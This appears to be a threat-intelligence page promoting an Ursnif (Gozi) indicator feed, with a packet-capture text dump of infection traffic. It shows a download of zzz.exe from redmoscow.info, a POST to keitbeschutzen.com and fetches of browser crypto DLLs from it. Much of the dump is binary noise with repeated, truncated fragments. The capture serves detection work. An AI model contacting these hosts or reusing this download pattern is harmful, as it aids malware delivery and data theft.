Text Example

zzz.exe Delivers Uzrsnif Gozi Malware Banking Trojan PCAP File Download Traffic Sample GET /mozglue.dll

Latest indicators of compromise from our our Ursnif IOC feed. Ursnif (aka Gozi, aka IFSB) is a banking trojan targeting users in the USA and Europe. It’s was designed for the primary purpose of perpetrating fraud.

Fast, accurate identification of commodity malware like Ursnif allows SOC teams to focus efforts on hunting for more highly targeted and stealthy malware. By quickly blocking, de-prioritizing and filtering out the noise associated with mass distributed malware and crimeware, our Threat Intelligence Feed allows you to focus on the threats that matter to your organization.

2019-10-03 06:01:00.812050 IP 192.168.86.25.53425 > 104.27.161.249.80: Flags [P.], seq 3229838630:3229839201, ack 2872661083, win 16450, length 571: HTTP: GET /tmp/zzz.exe HTTP/1.1
E..cS.@….&..V.h……P..m&.9T[P.@B1<..GET /tmp/zzz.exe HTTP/1.1
Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, /
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Range: bytes=120970-
Unless-Modified-Since: Thu, 03 Oct 2019 02:07:13 GMT
If-Range: “1e1000-593f80b3c67d3”
Host: redmoscow.info
Connection: Keep-Alive
Cookie: __cfduid=df482dfbd65d8b46f1c87aacc388aec4a1570096931

2019-10-03 06:01:04.855775 IP 104.27.161.249.80 > 192.168.86.25.53425: Flags [P.], seq 1848473:1849587, ack 571, win 30, length 1114: HTTP
E ..+.@.7…h…..V..P…U….oaP…g……………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………………….
2019-10-03 06:01:19.120810 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 2196019561:2196020046, ack 311058881, win 16514, length 485: HTTP: POST /223 HTTP/1.1
E…U.@…….V.h.K….P…i..a.P.@…..POST /223 HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
Content-Length: 25
Host: keitbeschutzen.com
Connection: Keep-Alive
Cache-Control: no-cache

–1BEF0A57BE110FD467A–

2019-10-03 06:01:19.279627 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 1:314, ack 485, win 233, length 313: HTTP: HTTP/1.1 200 OK
E .a./@.1…h.K…V..P….a….NP…….HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2019 10:02:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip

5c
……….3.1.C. ..F..:…z…..M..].o……….c..WRQbmj`]RT.j.._..Zl.[Z..l.[l..5…R…
0

2019-10-03 06:01:19.284253 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 485:842, ack 314, win 16435, length 357: HTTP: GET /freebl3.dll HTTP/1.1
E…U.@…. ..V.h.K….P…N..b.P.@3q7..GET /freebl3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive
2019-10-03 06:01:20.010931 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 264538:265974, ack 842, win 242, length 1436: HTTP
E ….@.1…h.K…V..P….k…..P….^………… ……………B…….NIST-P521………………………………m………………………………………………………………………………… …~…).a|m~M=.L.Hw,………. ….c.X………………………………………………. …~…).a|m~M=.L.Hw,………. ….0……………….0…P…p……………….B… …….Curve25519…………………………………………………………Z.5..:…..Uv…e….S..;.<>’.Kk....,BG....c.@.w.}.-.3...9E....O.B........J|...+.3Wk1^...@h7.Q..............................c%Q......k....,BG....c.@.w.}.-.3...9E....O.B........J|...+.3Wk1^...@h7.Q...............<...\...|...........................B... ........................................................................................................1/..>.....k..-....n..A.....P..Z.V9.....*.....*...."...7..... .tn.;b....Y.A..T*8U..].U)l:T^8rv .6..J.&,o]......)....(..|..1..... …~..zC.|……………………….cM..7-.X…H..z…j..)s…..”…7….. .tn.;b….Y.A..T8U..].U)l:T^8rv .6..J.&,o]……)….(..|..1….. ...~..zC.|..._..………………………@…p……………b…0……………………………………………………………………………………………………………………………………..Q.>.a……!…@…r[………. .V.9Q.~.{.R..;…5s..=,4..E..kP?………………>.f#..B.d.9.?.!.(.kM=..K^w..Y(...'....3H...jB..~~1...f.... 2019-10-03 06:01:20.126700 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 330594:332030, ack 842, win 242, length 1436: HTTP E ....@.1...h.K...V..P....m"....P...N'..d.G.t7.....BH........v................0...0...U.#..0...Z..{* ...q...-.eu.X0…U………I……C.N.W9G…0…U………..0…U.%..0 ..+…….0w..U…p0n05.3.1./http://crl3.digicert.com/sha2-assured-cs-g1.crl05.3.1./http://crl4.digicert.com/sha2-assured-cs-g1.crl0L..U. .E0C07. .H...l..0*0(..+.........https://www.digicert.com/CPS0...g.....0....+........x0v0$..+.....0...http://ocsp.digicert.com0N..+.....0..Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0...U.......0.0.. *.H.............CK.L .1"5.v.....=a. n.D<h.[....V.DV.4...YR....5........4D................Rl..!.W....\. :t[U........$..V{.q..K3@.-(>...A.....l.T|p....zXf...-.&.R.1Ln...j$..l.,....j.q.....AUuV.k..'.P...f..m..T....[n.H{...c..*..TS.....fB.}l…&……q.’
L………x.Gf…N.0…0………….8…5n..j…P0.. *.H……..0^1.0 ..U….US1.0…U.
..Symantec Corporation100…U…’Symantec Time Stamping Services CA – G20…121018000000Z..201229235959Z0b1.0 ..U….US1.0…U.
..Symantec Corporation1402..U…+Symantec Time Stamping Services Signer – G40..”0.. *.H………….0..
……c.9D..#.DI…..a
S…..,.J.n….K..c…2[.^.Z..(P…..a;EQ…V..G….f=G.pr…
…..d…%….”….z.w.[e…t.A…L….-.wD.h..tw..[2.V.3..c.I.:…3……….W.;…z”.$…p..N.&…..O….(r……….W0..S0…U…….0.0…U.%…..0
..+…….0…U………..0s..+……..g0e0*..+…..0…http://ts
2019-10-03 06:01:20.126720 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 334902:334952, ack 842, win 242, length 50: HTTP
E .Z..@.1…h.K…V..P….}…..P…e%..#j:…..9]…..’…..XC…#.#..+..9.,..I^.>….h..
2019-10-03 06:01:20.127904 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 842:1199, ack 334952, win 65047, length 357: HTTP: GET /mozglue.dll HTTP/1.1
E…Ur@…….V.h.K….P……~(P….b..GET /mozglue.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive
2019-10-03 06:01:20.253950 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 471372:472470, ack 1199, win 250, length 1098: HTTP
E .r.z@.1…h.K…V..P……….P…t2……7…1.0…..http://www.mozilla.com0.. *.H…………<“…q7.F..u.1….’ep......e....5N.-,..E…8…jK!…….. .yx.…R..bX:..v5…{.lh…5.u….~..~C……(.uxv..R3?r..&…VA..=c..m..$..Q. ……..?.4..q.oU.]…}..W[;..:..-..$../V ..w..9.2.ZoT.NO….[T….1..0T……?+…..m,%.5;..].j..e3/..]..). ..(c....Ls..….D.X.?….W…C…)…..Z.t..l…+…..(……….S..A.~uJ....-…..|…%.^.|.^]k.0.-J..fX0+………..2.R..y……..k.$….u.l|rC.p…….”………….6….O..’W+Z….%…4……<.R………0…. *.H…. .1…0……0r0^1.0 ..U….US1.0…U. ..Symantec Corporation100…U…’Symantec Time Stamping Services CA – G2…..8…5n..j…P0 ..+…….]0.. *.H…. .1.. *.H……0.. *.H…. .1…181114000811Z0#. *.H…. .1….$..b………..3=(.0.. *.H………… l. ……o…@y…c..TBT……pJ..g”&.AI.|./xO.G…k….”…….K.EX.I….7…..u…n…w|.X.}..L..#G….,3…B..K&.~..Y..W…..r9..fH.c..r.=.U[6H….F..S|.dC[}.5j…..s.4.b. Bv..N^H..9..r.w.v.u:….)…0.!..qu..[..E.Z….`.. M.E<.CjL.56…e_..h.5…. 2019-10-03 06:01:20.255368 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1199:1557, ack 472470, win 65338, length 358: HTTP: GET /msvcp140.dll HTTP/1.1
E…U.@…….V.h.K….P…….VP..:.O..GET /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
ESCOC

..M…t…..d……….Y………E.P…….Y………E.P…….Y………E.P…….Y….q….E.P…….Y….]….E.P…….Y….I….E.P.y…..Y….5…..x…P.b…..Y……….h…P.K…..Y……….X…P.4…..Y………}..t>..t:.C.@
…YY……E…3.[].U……M.3.W.E…..E..E..A… Y..tM.u..u.P…………..t’…t….t…….u$Sj.j:..Sj.j…Sj.j…Sj.j..`………{d.[u.h…. 2, length 1112: HTTP ………….A………..A..E…………..A..E…………..A………….A…………..A……………….A .E…………..A ….V.K..M.W…}……s.3..u…..-QV.u..7……..u8.M….D..0.2Bj.X;.r.+.+.+.;..M.w..].;M.u$QVS……….t……..;….0.7G…r…….3..u…..^[..].U..SVW.}…t$.]..u.+.V..3P.u………..u…….u.3._^[]……U……M..E.SV…q.3..X.
2, length 1436: HTTP
..m………………………………………………………………………………… …~…).a|m~M=.L.Hw,………. ….c.X………………………………………………. …~…).a|m~M=.L.Hw,………. ….0…

……………………………………………………………………………………………Q.>.a……!…@…r[………. .V.9Q.~.{.R..;…5s..=,4..E..kP?………………>.f#..B.d.9.?.!.(.`kM=..K^w..Y(…’….3H…jB
2, length 1436: HTTP

ured-cs-g1.crl0L..U. .E0C07. `.H…l..0*0(..+………https://www.digicert.com/CPS0…g…..0….+……..x0v0$..+…..0…http://ocsp.digicert.com0N..+…..0..Bhttp://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0.

.zXf…-.&.R.1Ln…j$..l.,….j.q…..AUuV.k..’.P…f..m..T….[n.H{…c....TS…..fB.`}l…&……q.’

..US1.0…U.

=G.pr…_…..d…%….”….z.w.[e…t.A.*..L….-.wD.h..tw..[2.V.3..c.I.:…3……….W.;…z”.$…p..N.&…..O….(r……….W0..S0…U…….0.0…U.%…..0

2, length 50: HTTP

7, length 357: HTTP: GET /mozglue.dll HTTP/1.1

/*;q=0.1

2019-10-03 06:01:20.255368 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1199:1557, ack 472470, win 65338, length 358: HTTP: GET /msvcp140.dll HTTP/1.1
E…U.@…….V.h.K….P…….VP..:.O..GET /msvcp140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:20.626528 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 912210:912940, ack 1557, win 258, length 730: HTTP
E ….@.1…h.K…V..P….M….~P….R..0…U…
Washington1.0…U….Redmond1.0…U.
..Microsoft Corporation1&0$..U….Microsoft Time-Stamp PCA 2010..3….L….!|…….0.. .H.e.........20.. *.H.... .1...*.H.... ...0/. *.H.... .1". .a..T.Gv ...P.^......p.......=..0....*.H.... ...1..0..0..0....^/..q..2...^J;.N....0..0...~0|1.0 ..U....US1.0...U... Washington1.0...U....Redmond1.0...U. ..Microsoft Corporation1&0$..U....Microsoft Time-Stamp PCA 2010..3....L....!|.......0...........J.m0..:.5B..0.. *.H............VQ.l......Wl.$.......v..-&>r%..2..MB.+....mn..Iz...^.) . ...UT..xS#{..;u 2...]q..Y;u........_.gD.a@.&...... .*...F....U..W.-/..&y.X…E.p.K.u….Y..I3…Z….r…g…q…Ut..&…..XQ……r.JB#..1..E…..o…f…………=.%5..B.k..n..>…….D…5..w…3
2019-10-03 06:01:20.627701 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1557:1911, ack 912940, win 65338, length 354: HTTP: GET /nss3.dll HTTP/1.1
E…V#@…….V.h.K….P…~..O.P..:….GET /nss3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.378227 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2159388:2159452, ack 1911, win 267, length 64: HTTP
E .h..@.1…h.K…V..P….T…..P….{…….!FjJ.h5.Ej._……….6V.f..0….[?.D.@..#1…j……….. 2019-10-03 06:01:21.379453 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 1911:2269, ack 2159452, win 65322, length 358: HTTP: GET /softokn3.dll HTTP/1.1 E…Wt@…….V.h.K….P……U.P..….GET /softokn3.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.529860 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2304488:2304650, ack 2269, win 275, length 162: HTTP
E …{@.1..Ih.K…V..P………FP…….i.-}d…Z…`…….w&.{.c.d.+l…x.vx..R..r….]…k.9…9..1…K…..U…f.dz..%R…….h.^.t.,..u.%MK>.e……>…6…..K..)Z.Qjn*.L.m9..-………..=p.0./…
2019-10-03 06:01:21.530760 IP 192.168.86.25.53426 > 104.244.75.147.80: Flags [P.], seq 2269:2631, ack 2304650, win 65338, length 362: HTTP: GET /vcruntime140.dll HTTP/1.1
E…W.@…….V.h.K….P…F…JP..:5;..GET /vcruntime140.dll HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Host: keitbeschutzen.com
Connection: Keep-Alive

2019-10-03 06:01:21.660746 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2387938:2388783, ack 2631, win 283, length 845: HTTP
E .u..@.1..ch.K…V..P……….P…’I..nV…B…….T.4&…X!^&…..
…..t.BY^…h.o..#r;:u.a..H..k……WcG=…….$…?.1…0……0..0|1.0 ..U….US1.0…U…
Washington1.0…U….Redmond1.0…U.
..Microsoft Corporation1&0$..U….Microsoft Time-Stamp PCA 2010..3….C:….R…….0.. .H.e.........20.. *.H.... .1...*.H.... ...0/. *.H.... .1". ..inH....'.......H..^.j..#:k..G)0....*.H.... ...1..0..0..0..........Nn..u...Q.. m:0..0...~0|1.0 ..U....US1.0...U... Washington1.0...U....Redmond1.0...U. ..Microsoft Corporation1&0$..U....Microsoft Time-Stamp PCA 2010..3....C:....R.......0.......fc.r..).........0.. *.H..............U.$"...... E...V...E.k.}.N…^….)..;…g%…..l..L..9.}.)..1..&.v……k.N:r….SVx;..xv…i.p…..p..2z..:..Qk_..v..l..b…K……j..}..Z..r.O}..-.{@…..$K….M.?h….%.t…..j.v…cK…….r.Yf.fZ”e.e.G…..x….k4.1..hfK.3……./(………..&bJ
2019-10-03 06:01:21.989504 IP 104.244.75.147.80 > 192.168.86.25.53426: Flags [P.], seq 2387938:2388783, ack 2631, win 283, length 845: HTTP
E .u..@.1..bh.K…V..P……….P…’I..nV…B…….T.4&…X!^&…..
…..t.BY^…h.o..#r;:u.a..H..k……WcG=…….$…?.1…0……0..0|1.0 ..U….US1.0…U…
Washington1.0…U….Redmond1.0…U.

Leave a Reply